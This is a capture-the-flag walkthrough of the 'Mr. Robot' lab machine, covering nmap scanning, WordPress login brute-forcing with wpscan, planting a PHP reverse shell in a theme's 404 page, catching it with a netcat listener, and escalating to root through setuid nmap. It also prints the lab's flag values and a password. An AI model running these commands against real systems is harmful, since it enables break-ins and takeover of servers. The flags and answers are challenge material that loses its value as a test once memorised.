Have you seen the hacker-themed TV show Mr. Robot?
The challenge involves using standard pen-testing tools like
nmap for enumeration and
gobuster for brute-force directory sniffing. We will also make use of exploiting a certain
bin command’s capability to run as root in order to carry out an attack to retrieve the last flag.
First, we connect to the VPN with OpenVPN, start up our target machine, and then note down our IPs.
export myIP=10.6.2.23 export targetIP=10.10.58.206
Let’s start scanning the target machine with
sudo nmap -Pn -sC -p- -O $targetIP
-Pnskips host discovery
-sCruns default script
-p-scans all ports
-Oenables OS detection
Here’s the output:
┌──(tester㉿box)-[~] └─$ sudo nmap -Pn -sC -p- -O $targetIP [sudo] password for tester: Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-01 12:16 EST Stats: 0:00:19 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 7.58% done; ETC: 12:20 (0:03:52 remaining) Stats: 0:13:21 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 90.25% done; ETC: 12:30 (0:01:27 remaining) Stats: 0:13:43 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 91.88% done; ETC: 12:30 (0:01:13 remaining) Nmap scan report for 10.10.15.66 Host is up (0.081s latency). Not shown: 65532 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp closed ssh 80/tcp open http |_http-title: Site doesn't have a title (text/html). 443/tcp open https | ssl-cert: Subject: commonName=www.example.com | Not valid before: 2015-09-16T10:45:03 |_Not valid after: 2025-09-13T10:45:03 |_http-title: Site doesn't have a title (text/html). Device type: general purpose|specialized|storage-misc|WAP|broadband router|printer Running (JUST GUESSING): Linux 3.X|5.X|4.X|2.6.X (91%), Crestron 2-Series (89%), HP embedded (89%), Asus embedded (88%) OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:5.4 cpe:/o:linux:linux_kernel:4 cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6.22 cpe:/o:linux:linux_kernel:2.6 cpe:/h:asus:rt-n56u Aggressive OS guesses: Linux 3.10 - 3.13 (91%), Linux 5.4 (91%), Linux 3.10 - 4.11 (90%), Linux 3.12 (90%), Linux 3.13 (90%), Linux 3.13 or 4.2 (90%), Linux 3.2 - 3.5 (90%), Linux 3.2 - 3.8 (90%), Linux 4.2 (90%), Linux 4.4 (90%) No exact OS matches for host (test conditions non-ideal). OS detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 942.40 seconds
For further enumeration, let’s grab
SecLists (a set of standard scanning wordlists),
seclists from the git repo at: https://github.com/danielmiessler/SecLists.git. Next, we’ll run
big.txt as our wordlist from
sudo gobuster dir -w /home/tester/hacking-tools/SecLists/Discovery/Web-Content/big.txt -u http://10.10.15.66
The most interesting pages that jump out at me are the
robots.txt and the
/wp-admin. Let’s look at both of them to see what additional hints we can find.
We discover (no surprise!) a login page to WordPress at
$targetIP/robots.txt we find:
User-agent: * fsocity.dic Key-1-of-3.txt
Locating The First Key
If we navigate in our browser to
$targetIP/fsocity.dic we download a dictionary file
fsocity.dic. Browsing through the dictionary, we notice that it appears to be a password wordlist.
$targetIP/key-1-of-3.txt reveals our first of three keys:
Determining The Username
Now that we have a login page to WordPress, a password wordlist (
fsociety.dic), all we need is a login username, and we will be ready to use
gobuster to brute-force our way into the admin dashboard.
After inspecting the login page, we guess a few names from the Mr. Robot show: Elliot, Mr. Robot, Tyrell.
The errors from the login page reveal that Elliot is a valid username, but Mr. Robot and Tyrell are not. To test this out, we can also try misspelling Elliott (with two t’s) with a random password to see that the error returned says:
Brute-Forcing The Password To WordPress Admin Dashboard
For this next attack we will use a specialized wordpress scanning tool:
wpscan --url 10.10.58.206 -P /home/tester/Downloads/fsocity.dic --usernames elliot
-Pfor password list
The scan successfully found Elliot’s password!
successfully found Elliot's password: ER28-0652
Uploading a Malicious Payload
After logging in to WordPress at
$targetIP/wp-login.php we find a dashboard. Clicking on the left sidebar on
Appearance/editor shows us a list of pages we can modify.
Let’s modify the
404.php error page to upload a malicious payload.
Spawning a Reverse Shell From WordPress
For our malicious payload, we will use pentest monkey’s PHP revshell from GitHub.
The only thing we need to modify on the payload is our attack machine’s IP and listening port. After updating the payload, we can save it in the
Now to spawn a shell to a listener, all we need to do is load up the
$targetIP/404.php page from our browser.
Let’s set up a listener with
sudo nc -lvnp 53
l= listen mode, for inbound connects
n= suppress name/port resolutions
We used port 53 for our listener port in this example.
Success! We just caught the reverse shell with
netcat. It is an unstable shell, so we can do a few things to stabilize it. We can start by spawning a proper shell with Python.
python -c 'import pty;pty.spawn("/bin/bash");’
After backgrounding the shell with
Ctrl+Z we enter the command:
stty raw -echo; fg
This command mirrors our terminal settings from the local machine to the
netcat listener shell. It will also give us abilities such as tab completion and up for most recent commands.
fg at the end of this command foregrounds the
And now, when we load the
404.php webpage, we successfully catch the revshell!
Decrypting User Robot’s Password
Found it! Now, all we need to do is to look this hash up on a website that hosts dictionaries of cracked hashes or crack it on our attack machine with a program like
crackstation we can find the cleartext of our password!
Finding The Second Key
After switching over to user
robot with our cracked password, we do a bit of enumeration and easily find the key.
su robot cat key-2-of-3.txt 822c73956184f694993bede3eb39f959
Privilege Escalation to Root
With the following command, we search for files in
/bin/ that have the
setuid bit set.
In other words, these types of files can run as
root from a non-root account. GTFObins has a comprehensive list of leveraging certain binaries’ abilities to carry out privilege escalation.
For this box, we will find out that there are several options with the command:
find / -perm +6000 2>/dev/null | grep '/bin/'
We will move forward with Nmap. It has the ability to go into an interactive mode where it can send and receive commands as the root user.
nmap in interactive mode with the command:
Then adding the prefix
! allows us to issue sudo commands. After locating the file for key 3, we can cat it out using
; to chain commands together.
nmap> !cd /root;cat key-3-of-3.txt 04787ddef27c3dee1ee161b21670b4e4
And now we have retrieved all 3 of Mr. Robot’s keys.